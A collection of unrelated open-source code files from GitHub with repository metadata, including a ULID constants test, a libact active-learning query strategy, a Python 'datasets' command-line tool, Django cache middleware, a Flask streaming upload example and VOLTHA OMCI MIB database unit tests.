assert value == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
def test_max_ulid_uses_expected_value():
"""
Assert that :func:`~ulid.consts.MAX_ULID` uses expected byte value.
"""
value = consts.MAX_ULID
assert value == b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff'
| {
"content_hash": "ba24e7abaeef34e316d5638dfff68599",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 87,
"avg_line_length": 27.017543859649123,
"alnum_prop": 0.6512987012987013,
"repo_name": "ahawker/ulid",
"id": "4b6e1bf3043cfa879011e87ed14d667a1d522023",
"size": "1540",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_consts.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "3387"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Python",
"bytes": "93605"
}
],
"symlink_target": ""
} |
"""Density Weighted
"""
from __future__ import division
import numpy as np
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.cluster import KMeans
from libact.base.interfaces import QueryStrategy
from libact.utils import inherit_docstring_from, seed_random_state, zip
class DensityWeightedMeta(QueryStrategy):
"""Density Weighted Meta Algorithm
:math:`\phi_A` represents the output of some base query strategy :math:`A`.
The instance to query is given as follows:
:math:`argmax_{\mathbf{x}} \phi_A(\mathbf{x}) \times (\frac{1}{U} \Sigma^{U}_{u=1} sim(\mathbf{x}, \mathbf{x}^{(u)}))^{\beta}`
The :math:`sim` function in this implementation is by first ran a
clustering algorithm. The clustering algorithm will output :math:`U`
centers. Then we use the similarity metric to calculate the average
similarity of the given instance :math:`\mathbf{X}` to each cluster
center.
Parameters
----------
base_query_strategy:
The query_strategy has to support _get_score() method.
similarity_metric: sklearn.metrics.pairwise class instance, optional (default=cosine_similarity)
http://scikit-learn.org/stable/modules/generated/sklearn.metrics.pairwise.cosine_similarity.html
clustering_method: sklearn.cluster class instance, optional (default=Kmeans())
should support method fit and transform and attribute cluster_centers_.
(reference: http://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.html)
beta : float
Scaling factor for the similarity term.
random_state : {int, np.random.RandomState instance, None}, optional (default=None)
If int or None, random_state is passed as parameter to generate
np.random.RandomState instance. if np.random.RandomState instance,
random_state is the random number generate.
Attributes
----------
Examples
--------
Here is an example of how to declare a DensityWeightedMeta query_strategy object:
.. code-block:: python
from libact.query_strategies import DensityWeightedMeta
from libact.models import LogisticRegression
qs = DensityWeightedMeta(dataset)
References
----------
.. [1] Settles, Burr. "Active learning literature survey." University of
Wisconsin, Madison 52.55-66 (2010): 11.
"""
def __init__(self, dataset, base_query_strategy, similarity_metric=None,
clustering_method=None, beta=1.0, random_state=None):
super(DensityWeightedMeta, self).__init__(dataset=dataset)
if not isinstance(base_query_strategy, QueryStrategy):
raise TypeError(
"'base_query_strategy' has to be an instance of 'QueryStrategy'"
)
if base_query_strategy.dataset != self.dataset:
raise ValueError("base_query_strategy should share the same"
"dataset instance with DensityWeightedMeta")
self.base_query_strategy = base_query_strategy
self.beta = beta
self.random_state_ = seed_random_state(random_state)
if clustering_method is not None:
self.clustering_method = clustering_method
else:
self.clustering_method = KMeans(
n_clusters=5, random_state=self.random_state_)
if similarity_metric is not None:
self.similarity_metric = similarity_metric
else:
self.similarity_metric = cosine_similarity
@inherit_docstring_from(QueryStrategy)
def update(self, entry_id, label):
pass
@inherit_docstring_from(QueryStrategy)
def _get_scores(self):
dataset = self.dataset
X, _ = zip(*dataset.data)
scores = self.base_query_strategy._get_scores()
_, X_pool = dataset.get_unlabeled_entries()
unlabeled_entry_ids, base_scores = zip(*scores)
self.clustering_method.fit(X)
pool_cluster = self.clustering_method.predict(X_pool)
cluster_center = self.clustering_method.cluster_centers_
similarity = []
for i in range(len(X_pool)):
similarity.append(
self.similarity_metric(
X_pool[i].reshape(1, -1),
cluster_center[pool_cluster[i]].reshape(1, -1)
)[0][0]
)
similarity = np.asarray(similarity)
scores = base_scores * similarity**self.beta
return zip(unlabeled_entry_ids, scores)
@inherit_docstring_from(QueryStrategy)
def make_query(self):
dataset = self.dataset
unlabeled_entry_ids, scores = zip(*self._get_scores())
ask_id = self.random_state_.choice(np.where(scores == np.max(scores))[0])
return unlabeled_entry_ids[ask_id] | {
"content_hash": "02d23aa7b41c9e838bda9862a8ebb53b",
"timestamp": "",
"source": "github",
"line_count": 131,
"max_line_length": 130,
"avg_line_length": 36.6793893129771,
"alnum_prop": 0.6499479708636836,
"repo_name": "ntucllab/libact",
"id": "b89f517b5ba7721ffecb9cf592037dff32f5843d",
"size": "4805",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "libact/query_strategies/density_weighted_meta.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "24287"
},
{
"name": "C++",
"bytes": "37716"
},
{
"name": "Python",
"bytes": "206547"
}
],
"symlink_target": ""
} |
import sys
import re
import yaml
import datetime
import os.path
import exceptions
from functools import wraps
from docopt import docopt
__version__ = '0.1.0'
defaultconfigs = [ os.path.join(sys.path[0],'datasets.yml'),
'/etc/datasets.yml',
os.path.expanduser('~/.datasets.yml'),
'./datasets.yml' ]
class Dataset:
"""Represents a dataset"""
def __init__(self, path, basedir = None):
self.basedir = basedir or os.path.dirname(path)
self.path = path
self._info()
def _info(self):
readme = os.path.join(self.path,'README')
if not os.path.isfile(readme):
raise InvalidDatasetException(
'Invalid dataset %s. Does not contain a README file.'%self.path)
self.name = os.path.relpath(self.path, self.basedir)
doc = yaml_safe_load_first(open(readme))
if not doc.get('dataset'):
raise InvalidDatasetException(
"Invalid dataset %s. Expected README YAML frontmatter to have 'dataset: true'." % self.path)
self.description = doc.get('description', "")
def get_subdatasets(self):
sub = []
subfiles = [os.path.join(self.path, i) for i in os.listdir(self.path)]
for d in [i for i in subfiles if os.path.isdir(i)]:
try:
sub.append(Dataset(d, basedir=self.basedir))
except (InvalidDatasetException):
pass
return sub
class InvalidDatasetException(exceptions.Exception):
pass
def argparsed(func):
@wraps(func)
def wrapped(argv, config):
args = docopt(func.__doc__, argv=argv)
return func(args, config)
return wrapped
def load_configs(configs):
paths = set()
for i in [f for f in configs if os.path.isfile(f)]:
for y in yaml.safe_load_all(open(i)):
paths.update(set(y.get('datasets',[])))
break; # only read the first YAML document per file
datasets = []
for i in paths:
try:
datasets.append(Dataset(i))
except (InvalidDatasetException):
pass # TODO: verbose warning
return {"datasets":datasets}
def get_dataset(path, roots):
if path.startswith('/'):
return Dataset(path)
head = path.split('/')[0]
for root in roots:
if head == os.path.basename(root.path):
return Dataset(os.path.join(os.path.dirname(root.path),path))
raise InvalidDatasetException("%s is not a dataset" % path)
@argparsed
def list(args, config):
"""
Usage: datasets list [options] [<dataset>...]
Show a short description for each of the available <dataset>s.
Options:
<dataset> Dataset name.
-r --recursive List all subdatasets.
--verbose Include more detailed descriptions if available.
Notes:
A dataset is simply a folder that has a README file that begins with:
---
dataset: true
description: optionally, a description here
---
You can register datasets by creating a file in ~/.datasets.yml, or
./datasets.yml that starts with the following:
---
datasets:
# just include the path to the dataset folder
# NOTE: folder must include a README
- /data/all_nsa_data/
- /data/mitt_romney_taxes/
"""
def _print_dataset(ds, args):
print " - {:<30} {:<30}".format(ds.name, ds.description)
if args["--verbose"]:
print " {:<30} Location: {:<30}".format("", ds.path)
if args["--recursive"]:
for i in ds.get_subdatasets():
_print_dataset(i, args)
if not config["datasets"]:
print "No datasets found."
return
sets = config['datasets']
if args['<dataset>']:
args['--recursive'] = True
try:
sets = map(lambda x: get_dataset(x, sets), args['<dataset>'])
except InvalidDatasetException, e:
print >> sys.stderr, "ERROR: %s" % e
sys.exit(-1)
print "Datasets:"
for ds in sets:
_print_dataset(ds, args)
print
@argparsed
def copy(args, config):
"""
Usage: datasets copy[options] <dataset>...
Make a lightweight copy of a <dataset>.
Options:
<dataset> Dataset Name
-c, --clobber Clobber existing files [Default: False]
-n, --dry-run Show what would happen.
"""
if not config["datasets"]:
print "No datasets found."
return
try:
sets = map(lambda x: get_dataset(x, config['datasets']), args['<dataset>'])
except InvalidDatasetException, e:
print >> sys.stderr, "ERROR: %s" % e
sys.exit(-1)
for ds in sets:
rootdir = ds.name
os.mkdir(rootdir)
for (path, dirs, files) in os.walk(ds.path):
relpath = os.path.relpath(path,ds.path)
for f in files:
source = os.path.realpath(os.path.join(ds.path,path,f))
target = os.path.join(rootdir,relpath,f)
if relpath == "." and f == 'README':
frontmatter, rest = get_readme(source)
frontmatter['source'] = ds.path
frontmatter['datecopied'] = datetime.datetime.now()
t = open(target, "w")
t.write(yaml.dump(frontmatter,
explicit_start = True, default_flow_style = False))
t.write('---\n')
t.write(rest)
t.close()
else:
os.symlink(source, target)
for d in dirs:
os.mkdir(os.path.join(rootdir,relpath,d))
@argparsed
def create(args, config):
"""
A dataset itself is simply any folder with specially formatted README file in
it. The README file must start with the following:
---
dataset: true
description: A short one-liner description of the dataset
includes:
- folder1
- folder2
---
And may be followed by anything else.
"""
pass
def get_readme(path):
"""returns (yamldoc, rest)"""
content = open(path).read()
match = re.match( r'^(---\s*$.*?^---\s*$)(.*)', content, re.MULTILINE | re.DOTALL )
return (yaml_safe_load_first(match.group(1)), match.group(2))
def yaml_safe_load_first(content):
for i in yaml.safe_load_all(content):
return i
def main(argv = None):
"""datasets is a simple utility for discovering datasets and making lightweight
copies to use in analyses.
Usage:
datasets <command> [<options>...]
General Options:
-h, --help Show help.
--version Show version and exit.
Commands:
list List available datasets.
copy Get a lightweight copy of a dataset.
create Create an empty dataset.
register Register a dataset in ~/.datasets.yml.
bash_completion Add bash autocomplete code to your ~/.bashrc
See 'datasets help <command>' for more information on a specific command."""
args = docopt(main.__doc__,
version='datasets version %s' % __version__,
options_first=True,
argv=argv or sys.argv[1:])
cmd = args['<command>']
try:
method = globals()[cmd]
assert callable(method)
except (KeyError, AssertionError):
exit("%r is not a datasets command. See 'datasets help'." % cmd)
config = load_configs(defaultconfigs)
argv = [args['<command>']] + args['<options>']
return method(argv, config)
if __name__ == '__main__':
main()
| {
"content_hash": "d1acd77b2ce9c5ff8a452d77494b954b",
"timestamp": "",
"source": "github",
"line_count": 255,
"max_line_length": 108,
"avg_line_length": 30.03529411764706,
"alnum_prop": 0.5709622666144405,
"repo_name": "pipitone/datasets",
"id": "71c65e45b624b528f2b15a58af89964b25c166e1",
"size": "7705",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "datasets.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "5732"
}
],
"symlink_target": ""
} |
"""
This file is part of the everest project.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Created on Feb 4, 2011.
"""
from everest.querying.operators import ASCENDING
from everest.querying.operators import DESCENDING
from everest.querying.orderparser import parse_order
from everest.querying.specifications import AscendingOrderSpecification
from everest.querying.specifications import ConjunctionOrderSpecification
from everest.querying.specifications import DescendingOrderSpecification
from everest.testing import TestCaseWithConfiguration
from pyparsing import ParseException
__docformat__ = 'reStructuredText en'
__all__ = ['OrderParserTestCase',
]
class OrderParserTestCase(TestCaseWithConfiguration):
def set_up(self):
TestCaseWithConfiguration.set_up(self)
self.parser = parse_order
def test_no_criterion_query(self):
expr = ''
self.assert_raises(ParseException, self.parser, expr)
def test_one_sort_order(self):
expr = 'name:asc'
result = self.parser(expr)
self.assert_true(isinstance(result, AscendingOrderSpecification))
self.assert_equal(result.attr_name, 'name')
self.assert_equal(result.operator, ASCENDING)
def test_one_sort_order_reversed(self):
expr = 'name:desc'
result = self.parser(expr)
self.assert_true(isinstance(result, DescendingOrderSpecification))
self.assert_equal(result.attr_name, 'name')
self.assert_equal(result.operator, DESCENDING)
def test_two_sort_order_left_reversed(self):
expr = 'name:desc~age:asc'
result = self.parser(expr)
self.assert_true(isinstance(result, ConjunctionOrderSpecification))
self.assert_true(isinstance(result.left,
DescendingOrderSpecification))
self.assert_true(isinstance(result.right,
AscendingOrderSpecification))
self.assert_equal(result.left.attr_name, 'name')
self.assert_equal(result.left.operator, DESCENDING)
self.assert_equal(result.right.attr_name, 'age')
self.assert_equal(result.right.operator, ASCENDING)
| {
"content_hash": "7483795b48508575d93230ce7e986ccb",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 76,
"avg_line_length": 40.127272727272725,
"alnum_prop": 0.7072949705482555,
"repo_name": "helixyte/everest",
"id": "7e9971363e4950048fed2656c4b80a89c0bb1787",
"size": "2207",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "everest/tests/test_orderparser.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "255"
},
{
"name": "Makefile",
"bytes": "4594"
},
{
"name": "Python",
"bytes": "1167712"
},
{
"name": "Shell",
"bytes": "4513"
}
],
"symlink_target": ""
} |
import zlib
from django.middleware.cache import UpdateCacheMiddleware
from django.utils.cache import patch_response_headers, get_max_age, has_vary_header
from django.core.cache import cache
import collections
class UpdateCacheMiddlewareSimpleKey(UpdateCacheMiddleware):
"""
Response-phase cache middleware that updates the cache if the response is
cacheable.
Must be used as part of the two-part update/fetch cache middleware.
UpdateCacheMiddleware must be the first piece of middleware in
MIDDLEWARE_CLASSES so that it'll get called last during the response phase.
THIS IS A PATCHED VERSION OF WHAT IS IN DJANGO TO NGINX CAN GET THE PAGES OUT EASY
"""
def process_response(self, request, response):
"""Sets the cache, if needed."""
#if not self._should_update_cache(request, response):
# # We don't need to update the cache, just return.
# return response
if response.streaming or response.status_code != 200:
return response
# Don't cache responses that set a user-specific (and maybe security
# sensitive) cookie in response to a cookie-less request.
if not request.COOKIES and response.cookies and has_vary_header(response, 'Cookie'):
return response
# Try to get the timeout from the "max-age" section of the "Cache-
# Control" header before reverting to using the default cache_timeout
# length.
timeout = get_max_age(response)
if timeout == None:
timeout = self.cache_timeout
elif timeout == 0:
# max-age was set to 0, don't bother caching.
return response
patch_response_headers(response, timeout)
if timeout:
cache_key = "%s-%s" % (self.key_prefix, request.get_full_path())
#raise ValueError(cache_key)
if hasattr(response, 'render') and isinstance(response.render, collections.Callable):
response.add_post_render_callback(
lambda r: cache._cache.set(cache_key.encode("utf-8"), zlib.compress(r.content, 9), timeout)
)
else:
# we use the highest compression level, because since it is cached we hope for it to pay off
cache._cache.set(cache_key.encode("utf-8"), zlib.compress(response.content, 9), timeout)
return response
| {
"content_hash": "db8a3583ded97403442ab211a17f370d",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 111,
"avg_line_length": 45.660377358490564,
"alnum_prop": 0.6528925619834711,
"repo_name": "codefisher/codefisher_apps",
"id": "f7d35d9f95c295276d0fee64ff564d7c8bee3cc3",
"size": "2420",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "middleware.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1920"
},
{
"name": "HTML",
"bytes": "32105"
},
{
"name": "JavaScript",
"bytes": "1146"
},
{
"name": "Python",
"bytes": "115129"
}
],
"symlink_target": ""
} |
import os
import tempfile
import time
from textwrap import dedent
from flask import Flask, request
from streaming_form_data import StreamingFormDataParser
from streaming_form_data.targets import FileTarget
app = Flask(__name__)
page = dedent(
'''
<!doctype html>
<head>
<title>Upload new File</title>
</head>
<body>
<h1>Upload new File</h1>
<form method="post" enctype="multipart/form-data" id="upload-file">
<input type="file" name="file">
<input type="submit" value="Upload">
</form>
</body>
'''
)
@app.route('/', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
file_ = FileTarget(os.path.join(tempfile.gettempdir(), 'test'))
parser = StreamingFormDataParser(headers=request.headers)
parser.register('file', file_)
time_start = time.perf_counter()
while True:
chunk = request.stream.read(8192)
if not chunk:
break
parser.data_received(chunk)
time_finish = time.perf_counter()
response = dedent(
'''
<!doctype html>
<head>
<title>Done!</title>
</head>
<body>
<h1>
{file_name} ({content_type}): upload done
</h1>
<h2>
Time spent on file reception: {duration}s
</h2>
</body>
'''.format(
file_name=file_.multipart_filename,
content_type=file_.multipart_content_type,
duration=(time_finish - time_start),
)
)
return response
return page
if __name__ == '__main__':
app.run(host='0.0.0.0')
| {
"content_hash": "324b4bdc2252249e89eb1ebdf6709f74",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 75,
"avg_line_length": 23.363636363636363,
"alnum_prop": 0.5175097276264592,
"repo_name": "siddhantgoel/streaming-form-data",
"id": "ea8832fc7514fcae63f7d2e4249d35750f4fb132",
"size": "1819",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "examples/flask/upload-test.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Cython",
"bytes": "15701"
},
{
"name": "Makefile",
"bytes": "982"
},
{
"name": "Python",
"bytes": "55599"
}
],
"symlink_target": ""
} |
from unittest import main, TestCase
from voltha.extensions.omci.omci_entities import *
from voltha.extensions.omci.database.mib_db_dict import *
from voltha.extensions.omci.database.mib_db_api import MODIFIED_KEY, CREATED_KEY,\
DEVICE_ID_KEY, MDS_KEY, LAST_SYNC_KEY
from mock.mock_adapter_agent import MockAdapterAgent, MockDevice
from nose.tools import raises, assert_raises
import time
_DEVICE_ID = 'br-549'
class TestOmciMibDbDict(TestCase):
def setUp(self):
self.adapter_agent = MockAdapterAgent()
self.adapter_agent.add_device(MockDevice(_DEVICE_ID)) # For Entity class lookups
self.db = MibDbVolatileDict(self.adapter_agent)
def tearDown(self):
self.db.stop()
def test_start_stop(self):
# Simple start stop
self.assertFalse(self.db.active)
self.db.start()
self.assertTrue(self.db.active)
self.db.stop()
self.assertFalse(self.db.active)
# Start after start still okay
self.db.start()
self.db.start()
self.assertTrue(self.db.active)
self.db.stop()
self.db.stop()
self.assertFalse(self.db.active)
@raises(DatabaseStateError)
def test_bad_state_add(self):
self.db.add(_DEVICE_ID)
@raises(DatabaseStateError)
def test_bad_state_remove(self):
self.db.remove(_DEVICE_ID)
@raises(DatabaseStateError)
def test_bad_state_query_1(self):
self.db.query(_DEVICE_ID, 0)
@raises(DatabaseStateError)
def test_bad_state_query_2(self):
self.db.query(_DEVICE_ID, 0, 0)
@raises(DatabaseStateError)
def test_bad_state_query_3(self):
self.db.query(_DEVICE_ID, 0, 0, 'test')
@raises(DatabaseStateError)
def test_bad_state_set(self):
self.db.set(_DEVICE_ID, 0, 0, {'test': 123})
@raises(DatabaseStateError)
def test_bad_state_delete(self):
self.db.delete(_DEVICE_ID, 0, 0)
@raises(KeyError)
def test_no_device_query(self):
self.db.start()
self.db.query(_DEVICE_ID)
def test_no_device_last_sync(self):
self.db.start()
# Returns None, not a KeyError
value = self.db.get_last_sync(_DEVICE_ID)
self.assertIsNone(value)
def test_no_device_mds(self):
self.db.start()
# Returns None, not a KeyError
value = self.db.get_mib_data_sync(_DEVICE_ID)
self.assertIsNone(value)
@raises(KeyError)
def test_no_device_save_last_sync(self):
self.db.start()
self.db.save_last_sync(_DEVICE_ID, datetime.utcnow())
@raises(KeyError)
def test_no_device_save_mds(self):
self.db.start()
self.db.save_mib_data_sync(_DEVICE_ID, 123)
def test_param_types(self):
self.db.start()
assert_raises(TypeError, self.db.add, 123)
assert_raises(TypeError, self.db.remove, 123)
assert_raises(TypeError, self.db.query, 123)
assert_raises(TypeError, self.db.get_mib_data_sync, 123)
assert_raises(TypeError, self.db.save_mib_data_sync, 123, 0)
assert_raises(TypeError, self.db.save_mib_data_sync, _DEVICE_ID, 'zero')
assert_raises(TypeError, self.db.get_last_sync, 123)
assert_raises(TypeError, self.db.save_last_sync, 123, datetime.utcnow())
assert_raises(TypeError, self.db.save_last_sync, _DEVICE_ID, 'bad-date')
assert_raises(TypeError, self.db.set, 123, 0, 0, {'test': 0})
assert_raises(TypeError, self.db.set, None, 0, 0, {'test': 0})
assert_raises(ValueError, self.db.set, _DEVICE_ID, None, 0, {'test': 0})
assert_raises(ValueError, self.db.set, _DEVICE_ID, 0, None, {'test': 0})
assert_raises(TypeError, self.db.set, _DEVICE_ID, 0, 0, None)
assert_raises(TypeError, self.db.set, _DEVICE_ID, 0, 0, 'not-a-dict')
assert_raises(ValueError, self.db.set, _DEVICE_ID, -1, 0, {'test': 0})
assert_raises(ValueError, self.db.set, _DEVICE_ID, 0x10000, 0, {'test': 0})
assert_raises(ValueError, self.db.set, _DEVICE_ID, 0, -1, {'test': 0})
assert_raises(ValueError, self.db.set, _DEVICE_ID, 0, 0x10000, {'test': 0})
assert_raises(TypeError, self.db.delete, 123, 0, 0)
assert_raises(ValueError, self.db.delete, _DEVICE_ID, -1, 0)
assert_raises(ValueError, self.db.delete, _DEVICE_ID, 0x10000, 0)
assert_raises(ValueError, self.db.delete, _DEVICE_ID, 0, -1)
assert_raises(ValueError, self.db.delete, _DEVICE_ID, 0, 0x10000)
def test_add_remove_device(self):
self.db.start()
# Remove of non-existent device is not an error
assert_raises(KeyError, self.db.query, _DEVICE_ID)
self.db.remove(_DEVICE_ID)
start_time = datetime.utcnow()
self.db.add(_DEVICE_ID)
dev_data = self.db.query(_DEVICE_ID)
end_time = datetime.utcnow()
self.assertEqual(dev_data[DEVICE_ID_KEY], _DEVICE_ID)
self.assertEquals(dev_data[MDS_KEY], 0)
self.assertIsNone(dev_data[LAST_SYNC_KEY])
self.assertEqual(dev_data[VERSION_KEY], MibDbVolatileDict.CURRENT_VERSION)
# Remove it
self.db.remove(_DEVICE_ID)
assert_raises(KeyError, self.db.query, _DEVICE_ID)
# Remove of non-existant dev okay
self.db.remove(_DEVICE_ID +'abcd')
# Overwrite tests
self.db.add(_DEVICE_ID)
assert_raises(KeyError, self.db.add, _DEVICE_ID)
self.db.add(_DEVICE_ID, overwrite=True) # This is okay
def test_mib_data_sync(self):
self.db.start()
self.db.add(_DEVICE_ID)
self.assertEquals(self.db.get_mib_data_sync(_DEVICE_ID), 0)
self.db.save_mib_data_sync(_DEVICE_ID, 100)
self.assertEqual(self.db.get_mib_data_sync(_DEVICE_ID), 100)
assert_raises(ValueError, self.db.save_mib_data_sync, _DEVICE_ID, -1)
assert_raises(ValueError, self.db.save_mib_data_sync, _DEVICE_ID, 256)
def test_last_sync(self):
self.db.start()
self.assertIsNone(self.db.get_last_sync(_DEVICE_ID))
self.db.add(_DEVICE_ID)
self.assertIsNone(self.db.get_last_sync(_DEVICE_ID))
now = datetime.utcnow()
self.db.save_last_sync(_DEVICE_ID, now)
self.assertEqual(self.db.get_last_sync(_DEVICE_ID), now)
assert_raises(TypeError, self.db.save_last_sync, _DEVICE_ID, 'hello')
def test_set_and_query(self):
self.db.start()
self.db.add(_DEVICE_ID) # Base device DB created here
time.sleep(0.1)
class_id = OntG.class_id
inst_id = 0
attributes = {'vendor_id': 'ABCD'}
start_time = datetime.utcnow()
set_occurred = self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
self.assertTrue(set_occurred)
end_time = datetime.utcnow()
dev_data = self.db.query(_DEVICE_ID)
self.assertEqual(dev_data[DEVICE_ID_KEY], _DEVICE_ID)
dev_classes = [v for k, v in dev_data.items() if isinstance(k, int)]
self.assertEqual(len(dev_classes), 1)
class_data = dev_classes[0]
self.assertEqual(class_data[CLASS_ID_KEY], class_id)
class_insts = [v for k, v in class_data.items() if isinstance(k, int)]
self.assertEqual(len(class_insts), 1)
inst_data = class_insts[0]
self.assertEqual(inst_data[INSTANCE_ID_KEY], inst_id)
self.assertGreaterEqual(inst_data[MODIFIED_KEY], start_time)
self.assertLessEqual(inst_data[MODIFIED_KEY], end_time)
self.assertLessEqual(inst_data[CREATED_KEY], inst_data[MODIFIED_KEY])
inst_attributes = inst_data[ATTRIBUTES_KEY]
self.assertEqual(len(inst_attributes), 1)
self.assertTrue('vendor_id' in inst_attributes)
self.assertEqual(inst_attributes['vendor_id'], attributes['vendor_id'])
########################################
# Query with device and class. Should be same as from full device query
cls_2_data = self.db.query(_DEVICE_ID, class_id)
self.assertEqual(class_data[CLASS_ID_KEY], cls_2_data[CLASS_ID_KEY])
cl2_insts = {k:v for k, v in cls_2_data.items() if isinstance(k, int)}
self.assertEqual(len(cl2_insts), len(class_insts))
# Bad class id query
cls_no_data = self.db.query(_DEVICE_ID, class_id + 1)
self.assertTrue(isinstance(cls_no_data, dict))
self.assertEqual(len(cls_no_data), 0)
########################################
# Query with device, class, instance
inst_2_data = self.db.query(_DEVICE_ID, class_id, inst_id)
self.assertEqual(inst_data[INSTANCE_ID_KEY], inst_2_data[INSTANCE_ID_KEY])
self.assertEqual(inst_data[MODIFIED_KEY], inst_2_data[MODIFIED_KEY])
self.assertEqual(inst_data[CREATED_KEY], inst_2_data[CREATED_KEY])
inst2_attr = inst_2_data[ATTRIBUTES_KEY]
self.assertEqual(len(inst2_attr), len(inst_attributes))
# Bad instance id query
inst_no_data = self.db.query(_DEVICE_ID, class_id, inst_id + 100)
self.assertTrue(isinstance(inst_no_data, dict))
self.assertEqual(len(inst_no_data), 0)
########################################
# Attribute queries
attr_2_data = self.db.query(_DEVICE_ID, class_id, inst_id, 'vendor_id')
self.assertEqual(attr_2_data['vendor_id'], attributes['vendor_id'])
attr_3_data = self.db.query(_DEVICE_ID, class_id, inst_id, ['vendor_id'])
self.assertEqual(attr_3_data['vendor_id'], attributes['vendor_id'])
attr_4_data = self.db.query(_DEVICE_ID, class_id, inst_id, {'vendor_id'})
self.assertEqual(attr_4_data['vendor_id'], attributes['vendor_id'])
attr_no_data = self.db.query(_DEVICE_ID, class_id, inst_id, 'no_such_thing')
self.assertTrue(isinstance(attr_no_data, dict))
self.assertEqual(len(attr_no_data), 0)
# Set to same value does not change modified data. The modified is
# at the instance level
class_id = OntG.class_id
inst_id = 0
attributes = {'vendor_id': 'ABCD'}
set_occurred = self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
self.assertFalse(set_occurred)
inst_3_data = self.db.query(_DEVICE_ID, class_id, inst_id)
self.assertEqual(inst_data[MODIFIED_KEY], inst_3_data[MODIFIED_KEY])
self.assertEqual(inst_data[CREATED_KEY], inst_3_data[CREATED_KEY])
# But set to new value does
time.sleep(0.1)
attributes = {'vendor_id': 'WXYZ'}
set_occurred = self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
self.assertTrue(set_occurred)
inst_4_data = self.db.query(_DEVICE_ID, class_id, inst_id)
self.assertLess(inst_3_data[MODIFIED_KEY], inst_4_data[MODIFIED_KEY])
self.assertEqual(inst_3_data[CREATED_KEY], inst_4_data[CREATED_KEY])
def test_delete_instances(self):
self.db.start()
self.db.add(_DEVICE_ID)
create_time = datetime.utcnow()
class_id = GalEthernetProfile.class_id
inst_id_1 = 0x100
inst_id_2 = 0x200
attributes = {'max_gem_payload_size': 1500}
self.db.set(_DEVICE_ID, class_id, inst_id_1, attributes)
self.db.set(_DEVICE_ID, class_id, inst_id_2, attributes)
set_time = datetime.utcnow()
time.sleep(0.1)
dev_data = self.db.query(_DEVICE_ID)
cls_data = self.db.query(_DEVICE_ID, class_id)
inst_data = {k: v for k, v in cls_data.items() if isinstance(k, int)}
self.assertEqual(len(inst_data), 2)
self.assertLessEqual(dev_data[CREATED_KEY], create_time)
self.assertLessEqual(self.db.created, create_time)
# Delete one instance
time.sleep(0.1)
del_time = datetime.utcnow()
result = self.db.delete(_DEVICE_ID, class_id, inst_id_1)
self.assertTrue(result) # True returned if a del actually happened
dev_data = self.db.query(_DEVICE_ID)
cls_data = self.db.query(_DEVICE_ID, class_id)
inst_data = {k: v for k, v in cls_data.items() if isinstance(k, int)}
self.assertEqual(len(inst_data), 1)
self.assertLessEqual(dev_data[CREATED_KEY], create_time)
self.assertLessEqual(self.db.created, create_time)
# Delete remaining instance
time.sleep(0.1)
result = self.db.delete(_DEVICE_ID, class_id, inst_id_2)
self.assertTrue(result) # True returned if a del actually happened
dev_data = self.db.query(_DEVICE_ID)
cls_data = {k: v for k, v in dev_data.items() if isinstance(k, int)}
self.assertEqual(len(cls_data), 0)
self.assertLessEqual(dev_data[CREATED_KEY], create_time)
# Delete returns false if not instance
self.assertFalse(self.db.delete(_DEVICE_ID, class_id, inst_id_1))
self.assertFalse(self.db.delete(_DEVICE_ID, class_id, inst_id_2))
def test_on_mib_reset_listener(self):
self.db.start()
self.db.add(_DEVICE_ID)
time.sleep(0.1)
class_id = OntG.class_id
inst_id = 0
attributes = {'vendor_id': 'ABCD'}
set_time = datetime.utcnow()
self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
time.sleep(0.1)
self.db.on_mib_reset(_DEVICE_ID)
dev_data = self.db.query(_DEVICE_ID)
self.assertEqual(dev_data[DEVICE_ID_KEY], _DEVICE_ID)
self.assertLessEqual(dev_data[CREATED_KEY], set_time)
self.assertLessEqual(self.db.created, set_time)
self.assertFalse(any(isinstance(cls, int) for cls in dev_data.iterkeys()))
def test_str_field_serialization(self):
self.db.start()
self.db.add(_DEVICE_ID)
class_id = OltG.class_id
inst_id = 0
attributes = {
'olt_vendor_id': 'ABCD', # StrFixedLenField(4)
}
self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
data = self.db.query(_DEVICE_ID, class_id, inst_id, attributes.keys())
self.assertTrue(all(isinstance(data[k], basestring) for k in attributes.keys()))
self.assertTrue(all(data[k] == attributes[k] for k in attributes.keys()))
def test_mac_address_ip_field_serialization(self):
self.db.start()
self.db.add(_DEVICE_ID)
class_id = IpHostConfigData.class_id
inst_id = 0
attributes = {
'mac_address': '00:01:02:03:04:05', # MACField
'ip_address': '1.2.3.4', # IPField
}
self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
data = self.db.query(_DEVICE_ID, class_id, inst_id, attributes.keys())
self.assertTrue(all(isinstance(data[k], basestring) for k in attributes.keys()))
self.assertTrue(all(data[k] == attributes[k] for k in attributes.keys()))
